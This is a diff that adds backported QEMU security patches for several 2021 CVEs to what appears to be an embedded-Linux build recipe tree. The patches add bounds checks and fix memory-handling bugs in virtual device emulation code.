+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
1From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
2From: Li Qiang <liq3ea@163.com>
3Date: Sat, 15 May 2021 20:04:02 -0700
4Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
5 (CVE-2021-3546)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=UTF-8
8Content-Transfer-Encoding: 8bit
9
10If 'virgl_cmd_get_capset' set 'max_size' to 0,
11the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
12This patch avoid this by checking the returned 'max_size'.
13
14virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
15virgl capabilities max_size")
16
17Fixes: CVE-2021-3546
18Reported-by: Li Qiang <liq3ea@163.com>
19Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
20Signed-off-by: Li Qiang <liq3ea@163.com>
21Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
22Message-Id: <20210516030403.107723-8-liq3ea@163.com>
23Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
24
25Upstream-Status: Backport
26CVE: CVE-2021-3546
27Signed-off-by: Armin Kuster <akuster@mvista.com>
28
29---
30 contrib/vhost-user-gpu/virgl.c | 4 ++++
31 1 file changed, 4 insertions(+)
32
33Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
34===================================================================
35--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
36+++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
37@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
38
39 virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
40 &max_size);
41+ if (!max_size) {
42+ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
43+ return;
44+ }
45 resp = g_malloc0(sizeof(*resp) + max_size);
46
47 resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 0000000000..7a88e29384
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
1From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
2From: Marcel Apfelbaum <marcel@redhat.com>
3Date: Wed, 16 Jun 2021 14:06:00 +0300
4Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
5 (CVE-2021-3582)
6
7Ensure mremap boundaries not trusting the guest kernel to
8pass the correct buffer length.
9
10Fixes: CVE-2021-3582
11Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
12Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
13Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
14Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
15Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
16Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
17Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
18Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
19
20CVE: CVE-2021-3582
21Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
22Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
23---
24 hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
25 1 file changed, 7 insertions(+)
26
27diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
28index f59879e257..da7ddfa548 100644
29--- a/hw/rdma/vmw/pvrdma_cmd.c
30+++ b/hw/rdma/vmw/pvrdma_cmd.c
31@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
32 return NULL;
33 }
34
35+ length = ROUND_UP(length, TARGET_PAGE_SIZE);
36+ if (nchunks * TARGET_PAGE_SIZE != length) {
37+ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
38+ (unsigned long)length);
39+ return NULL;
40+ }
41+
42 dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
43 if (!dir) {
44 rdma_error_report("Failed to map to page directory");
45--
462.25.1
47
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
1From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
2From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
3Date: Wed, 30 Jun 2021 14:46:34 +0300
4Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
5
6Check the guest passed a non zero page count
7for pvrdma device ring buffers.
8
9Fixes: CVE-2021-3607
10Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
11Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
12Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
13Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
14Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
15Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
16Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
17
18CVE: CVE-2021-3607
19Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
20Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
21---
22 hw/rdma/vmw/pvrdma_main.c | 5 +++++
23 1 file changed, 5 insertions(+)
24
25diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
26index 84ae8024fc..7c0c3551a8 100644
27--- a/hw/rdma/vmw/pvrdma_main.c
28+++ b/hw/rdma/vmw/pvrdma_main.c
29@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
30 uint64_t *dir, *tbl;
31 int rc = 0;
32
33+ if (!num_pages) {
34+ rdma_error_report("Ring pages count must be strictly positive");
35+ return -EINVAL;
36+ }
37+
38 dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
39 if (!dir) {
40 rdma_error_report("Failed to map to page directory (ring %s)", name);
41--
422.25.1
43
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 0000000000..7055ec3d23
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
1From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
2From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
3Date: Wed, 30 Jun 2021 14:52:46 +0300
4Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Do not unmap uninitialized dma addresses.
10
11Fixes: CVE-2021-3608
12Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
13Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
14Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
15Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
16Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
17Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
18Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
19Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
20
21CVE: CVE-2021-3608
22Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
23Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
24---
25 hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
26 1 file changed, 1 insertion(+), 1 deletion(-)
27
28Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
29===================================================================
30--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
31+++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
32@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
33 atomic_set(&ring->ring_state->cons_head, 0);
34 */
35 ring->npages = npages;
36- ring->pages = g_malloc(npages * sizeof(void *));
37+ ring->pages = g_malloc0(npages * sizeof(void *));
38
39 for (i = 0; i < npages; i++) {
40 if (!tbl[i]) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
1From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
2From: Vivek Kumbhar <vkumbhar@mvista.com>
3Date: Fri, 11 Nov 2022 12:43:26 +0530
4Subject: [PATCH] CVE-2021-3638
5
6Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
7CVE: CVE-2021-3638
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9
10When building QEMU with DEBUG_ATI defined then running with
11'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
12we get:
13
14 ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
15 ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
16 ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
17 ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
18 ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
19 ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
20 ati_mm_write 4 0x1420 DST_Y <- 0x3fff
21 ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
22 ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
23 ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
24rop:0xff
25 ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
26 ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
27y:16383, w:16383, h:16383, xor:0xff000000)
28 Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
29 (gdb) bt
30 #0 0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
31 #1 0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
32 #2 0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
33hw/display/ati_2d.c:196
34 #3 0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
35data=1073692671, size=4) at hw/display/ati.c:843
36 #4 0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
37addr=5512, ..., size=4, ...) at softmmu/memory.c:492
38
39Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
40the local dst_x and dst_y which adjust the (x, y) coordinates
41depending on the direction in the SRCCOPY ROP3 operation, but
42forgot to address the same issue for the PATCOPY, BLACKNESS and
43WHITENESS operations, which also call pixman_fill().
44
45Fix that now by using the adjusted coordinates in the pixman_fill
46call, and update the related debug printf().
47---
48 hw/display/ati_2d.c | 6 +++---
49 1 file changed, 3 insertions(+), 3 deletions(-)
50
51diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
52index 4dc10ea7..692bec91 100644
53--- a/hw/display/ati_2d.c
54+++ b/hw/display/ati_2d.c
55@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
56 DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
57 s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
58 s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
59- s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
60+ s->regs.src_x, s->regs.src_y, dst_x, dst_y,
61 s->regs.dst_width, s->regs.dst_height,
62 (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
63 (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
64@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
65 dst_stride /= sizeof(uint32_t);
66 DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
67 dst_bits, dst_stride, bpp,
68- s->regs.dst_x, s->regs.dst_y,
69+ dst_x, dst_y,
70 s->regs.dst_width, s->regs.dst_height,
71 filler);
72 pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
73- s->regs.dst_x, s->regs.dst_y,
74+ dst_x, dst_y,
75 s->regs.dst_width, s->regs.dst_height,
76 filler);
77 if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
78--
792.25.1
80
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
1From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Thu, 22 Jul 2021 09:27:56 +0200
4Subject: [PATCH] usbredir: fix free call
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9data might point into the middle of a larger buffer, there is a separate
10free_on_destroy pointer passed into bufp_alloc() to handle that. It is
11only used in the normal workflow though, not when dropping packets due
12to the queue being full. Fix that.
13
14Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
15Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
16Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
17Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
18
19CVE: CVE-2021-3682
20Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
21Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
22---
23 hw/usb/redirect.c | 2 +-
24 1 file changed, 1 insertion(+), 1 deletion(-)
25
26diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
27index 4ec9326e05..1ec909a63a 100644
28--- a/hw/usb/redirect.c
29+++ b/hw/usb/redirect.c
30@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
31 if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
32 if (dev->endpoint[EP2I(ep)].bufpq_size >
33 dev->endpoint[EP2I(ep)].bufpq_target_size) {
34- free(data);
35+ free(free_on_destroy);
36 return -1;
37 }
38 dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
39--
402.25.1
41
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
new file mode 100644
index 0000000000..cdd9c38db9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
1From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
2From: Gerd Hoffmann <kraxel@redhat.com>
3Date: Wed, 18 Aug 2021 14:05:05 +0200
4Subject: [PATCH] uas: add stream number sanity checks.
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9MIME-Version: 1.0
10Content-Type: text/plain; charset=UTF-8
11Content-Transfer-Encoding: 8bit
12
13The device uses the guest-supplied stream number unchecked, which can
14lead to guest-triggered out-of-band access to the UASDevice->data3 and
15UASDevice->status3 fields. Add the missing checks.
16
17Fixes: CVE-2021-3713
18Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
19Reported-by: Chen Zhe <chenzhe@huawei.com>
20Reported-by: Tan Jingguo <tanjingguo@huawei.com>
21Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
22Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
23
24https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
25CVE: CVE-2021-3713
26Upstream-Status: Backport
27Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
28---
29 hw/usb/dev-uas.c | 11 +++++++++++
30 1 file changed, 11 insertions(+)
31
32diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
33index 6d6d1073..0b8cd4dd 100644
34--- a/hw/usb/dev-uas.c
35+++ b/hw/usb/dev-uas.c
36@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
37 }
38 break;
39 case UAS_PIPE_ID_STATUS:
40+ if (p->stream > UAS_MAX_STREAMS) {
41+ goto err_stream;
42+ }
43 if (p->stream) {
44 QTAILQ_FOREACH(st, &uas->results, next) {
45 if (st->stream == p->stream) {
46@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
47 break;
48 case UAS_PIPE_ID_DATA_IN:
49 case UAS_PIPE_ID_DATA_OUT:
50+ if (p->stream > UAS_MAX_STREAMS) {
51+ goto err_stream;
52+ }
53 if (p->stream) {
54 req = usb_uas_find_request(uas, p->stream);
55 } else {
56@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
57 p->status = USB_RET_STALL;
58 break;
59 }
60+
61+err_stream:
62+ error_report("%s: invalid stream %d", __func__, p->stream);
63+ p->status = USB_RET_STALL;
64+ return;
65 }
66
67 static void usb_uas_unrealize(USBDevice *dev, Error **errp)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
new file mode 100644
index 0000000000..b291ade4e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
1From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Thu, 2 Sep 2021 13:44:12 +0800
4Subject: [PATCH] virtio-net: fix use after unmap/free for sg
5
6When mergeable buffer is enabled, we try to set the num_buffers after
7the virtqueue elem has been unmapped. This will lead several issues,
8E.g a use after free when the descriptor has an address which belongs
9to the non direct access region. In this case we use bounce buffer
10that is allocated during address_space_map() and freed during
11address_space_unmap().
12
13Fixing this by storing the elems temporarily in an array and delay the
14unmap after we set the the num_buffers.
15
16This addresses CVE-2021-3748.
17
18Reported-by: Alexander Bulekov <alxndr@bu.edu>
19Fixes: fbe78f4f55c6 ("virtio-net support")
20Cc: qemu-stable@nongnu.org
21Signed-off-by: Jason Wang <jasowang@redhat.com>
22
23https://github.com/qemu/qemu/commit/bedd7e93d01961fcb16a97ae45d93acf357e11f6
24CVE: CVE-2021-3748
25Upstream-Status: Backport
26Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
27---
28 hw/net/virtio-net.c | 39 ++++++++++++++++++++++++++++++++-------
29 1 file changed, 32 insertions(+), 7 deletions(-)
30
31diff --git a/hw/net/virtio-net.c b/hw/net/virtio-net.c
32index 16d20cdee52a..f205331dcf8c 100644
33--- a/hw/net/virtio-net.c
34+++ b/hw/net/virtio-net.c
35@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
36 VirtIONet *n = qemu_get_nic_opaque(nc);
37 VirtIONetQueue *q = virtio_net_get_subqueue(nc);
38 VirtIODevice *vdev = VIRTIO_DEVICE(n);
39+ VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
40+ size_t lens[VIRTQUEUE_MAX_SIZE];
41 struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
42 struct virtio_net_hdr_mrg_rxbuf mhdr;
43 unsigned mhdr_cnt = 0;
44- size_t offset, i, guest_offset;
45+ size_t offset, i, guest_offset, j;
46+ ssize_t err;
47
48 if (!virtio_net_can_receive(nc)) {
49 return -1;
50@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
51
52 total = 0;
53
54+ if (i == VIRTQUEUE_MAX_SIZE) {
55+ virtio_error(vdev, "virtio-net unexpected long buffer chain");
56+ err = size;
57+ goto err;
58+ }
59+
60 elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
61 if (!elem) {
62 if (i) {
63@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
64 n->guest_hdr_len, n->host_hdr_len,
65 vdev->guest_features);
66 }
67- return -1;
68+ err = -1;
69+ goto err;
70 }
71
72 if (elem->in_num < 1) {
73@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
74 "virtio-net receive queue contains no in buffers");
75 virtqueue_detach_element(q->rx_vq, elem, 0);
76 g_free(elem);
77- return -1;
78+ err = -1;
79+ goto err;
80 }
81
82 sg = elem->in_sg;
83@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
84 if (!n->mergeable_rx_bufs && offset < size) {
85 virtqueue_unpop(q->rx_vq, elem, total);
86 g_free(elem);
87- return size;
88+ err = size;
89+ goto err;
90 }
91
92- /* signal other side */
93- virtqueue_fill(q->rx_vq, elem, total, i++);
94- g_free(elem);
95+ elems[i] = elem;
96+ lens[i] = total;
97+ i++;
98 }
99
100 if (mhdr_cnt) {
101@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
102 &mhdr.num_buffers, sizeof mhdr.num_buffers);
103 }
104
105+ for (j = 0; j < i; j++) {
106+ /* signal other side */
107+ virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
108+ g_free(elems[j]);
109+ }
110+
111 virtqueue_flush(q->rx_vq, i);
112 virtio_notify(vdev, q->rx_vq);
113
114 return size;
115+
116+err:
117+ for (j = 0; j < i; j++) {
118+ g_free(elems[j]);
119+ }
120+
121+ return err;
122 }
123
124 static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
new file mode 100644
index 0000000000..43630e71fb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
1From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 10 Oct 2022 17:44:41 +0530
4Subject: [PATCH] CVE-2021-3750
5
6Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
7CVE: CVE-2021-3750
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 exec.c | 55 +++++++++++++++++++++++++++++++-------
11 hw/intc/arm_gicv3_redist.c | 4 +--
12 include/exec/memattrs.h | 9 +++++++
13 3 files changed, 56 insertions(+), 12 deletions(-)
14
15diff --git a/exec.c b/exec.c
16index 1360051a..10581d8d 100644
17--- a/exec.c
18+++ b/exec.c
19@@ -39,6 +39,7 @@
20 #include "qemu/config-file.h"
21 #include "qemu/error-report.h"
22 #include "qemu/qemu-print.h"
23+#include "qemu/log.h"
24 #if defined(CONFIG_USER_ONLY)
25 #include "qemu.h"
26 #else /* !CONFIG_USER_ONLY */
27@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
28 return release_lock;
29 }
30
31+/**
32++ * flatview_access_allowed
33++ * @mr: #MemoryRegion to be accessed
34++ * @attrs: memory transaction attributes
35++ * @addr: address within that memory region
36++ * @len: the number of bytes to access
37++ *
38++ * Check if a memory transaction is allowed.
39++ *
40++ * Returns: true if transaction is allowed, false if denied.
41++ */
42+static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
43+ hwaddr addr, hwaddr len)
44+{
45+ if (likely(!attrs.memory)) {
46+ return true;
47+ }
48+ if (memory_region_is_ram(mr)) {
49+ return true;
50+ }
51+ qemu_log_mask(LOG_GUEST_ERROR,
52+ "Invalid access to non-RAM device at "
53+ "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
54+ "region '%s'\n", addr, len, memory_region_name(mr));
55+ return false;
56+}
57+
58 /* Called within RCU critical section. */
59 static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
60 MemTxAttrs attrs,
61@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
62 bool release_lock = false;
63
64 for (;;) {
65- if (!memory_access_is_direct(mr, true)) {
66+ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
67+ result |= MEMTX_ACCESS_ERROR;
68+ /* Keep going. */
69+ } else if (!memory_access_is_direct(mr, true)) {
70 release_lock |= prepare_mmio_access(mr);
71 l = memory_access_size(mr, l, addr1);
72 /* XXX: could force current_cpu to NULL to avoid
73@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
74 hwaddr l;
75 hwaddr addr1;
76 MemoryRegion *mr;
77- MemTxResult result = MEMTX_OK;
78
79 l = len;
80 mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
81- result = flatview_write_continue(fv, addr, attrs, buf, len,
82- addr1, l, mr);
83-
84- return result;
85+ if (!flatview_access_allowed(mr, attrs, addr, len)) {
86+ return MEMTX_ACCESS_ERROR;
87+ }
88+ return flatview_write_continue(fv, addr, attrs, buf, len,
89+ addr1, l, mr);
90 }
91
92 /* Called within RCU critical section. */
93@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
94 bool release_lock = false;
95
96 for (;;) {
97- if (!memory_access_is_direct(mr, false)) {
98+ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
99+ result |= MEMTX_ACCESS_ERROR;
100+ /* Keep going. */
101+ } else if (!memory_access_is_direct(mr, false)) {
102 /* I/O case */
103 release_lock |= prepare_mmio_access(mr);
104 l = memory_access_size(mr, l, addr1);
105@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
106
107 l = len;
108 mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
109+ if (!flatview_access_allowed(mr, attrs, addr, len)) {
110+ return MEMTX_ACCESS_ERROR;
111+ }
112 return flatview_read_continue(fv, addr, attrs, buf, len,
113 addr1, l, mr);
114 }
115@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
116 MemTxAttrs attrs)
117 {
118 FlatView *fv;
119- bool result;
120
121 RCU_READ_LOCK_GUARD();
122 fv = address_space_to_flatview(as);
123- result = flatview_access_valid(fv, addr, len, is_write, attrs);
124- return result;
125+ return flatview_access_valid(fv, addr, len, is_write, attrs);
126 }
127
128 static hwaddr
129diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
130index 8645220d..44368e28 100644
131--- a/hw/intc/arm_gicv3_redist.c
132+++ b/hw/intc/arm_gicv3_redist.c
133@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
134 break;
135 }
136
137- if (r == MEMTX_ERROR) {
138+ if (r != MEMTX_OK) {
139 qemu_log_mask(LOG_GUEST_ERROR,
140 "%s: invalid guest read at offset " TARGET_FMT_plx
141 "size %u\n", __func__, offset, size);
142@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
143 break;
144 }
145
146- if (r == MEMTX_ERROR) {
147+ if (r != MEMTX_OK) {
148 qemu_log_mask(LOG_GUEST_ERROR,
149 "%s: invalid guest write at offset " TARGET_FMT_plx
150 "size %u\n", __func__, offset, size);
151diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
152index 95f2d20d..9fb98bc1 100644
153--- a/include/exec/memattrs.h
154+++ b/include/exec/memattrs.h
155@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
156 unsigned int secure:1;
157 /* Memory access is usermode (unprivileged) */
158 unsigned int user:1;
159+ /*
160+ * Bus interconnect and peripherals can access anything (memories,
161+ * devices) by default. By setting the 'memory' bit, bus transaction
162+ * are restricted to "normal" memories (per the AMBA documentation)
163+ * versus devices. Access to devices will be logged and rejected
164+ * (see MEMTX_ACCESS_ERROR).
165+ */
166+ unsigned int memory:1;
167 /* Requester ID (for MSI for example) */
168 unsigned int requester_id:16;
169 /* Invert endianness for this page */
170@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
171 #define MEMTX_OK 0
172 #define MEMTX_ERROR (1U << 0) /* device returned an error */
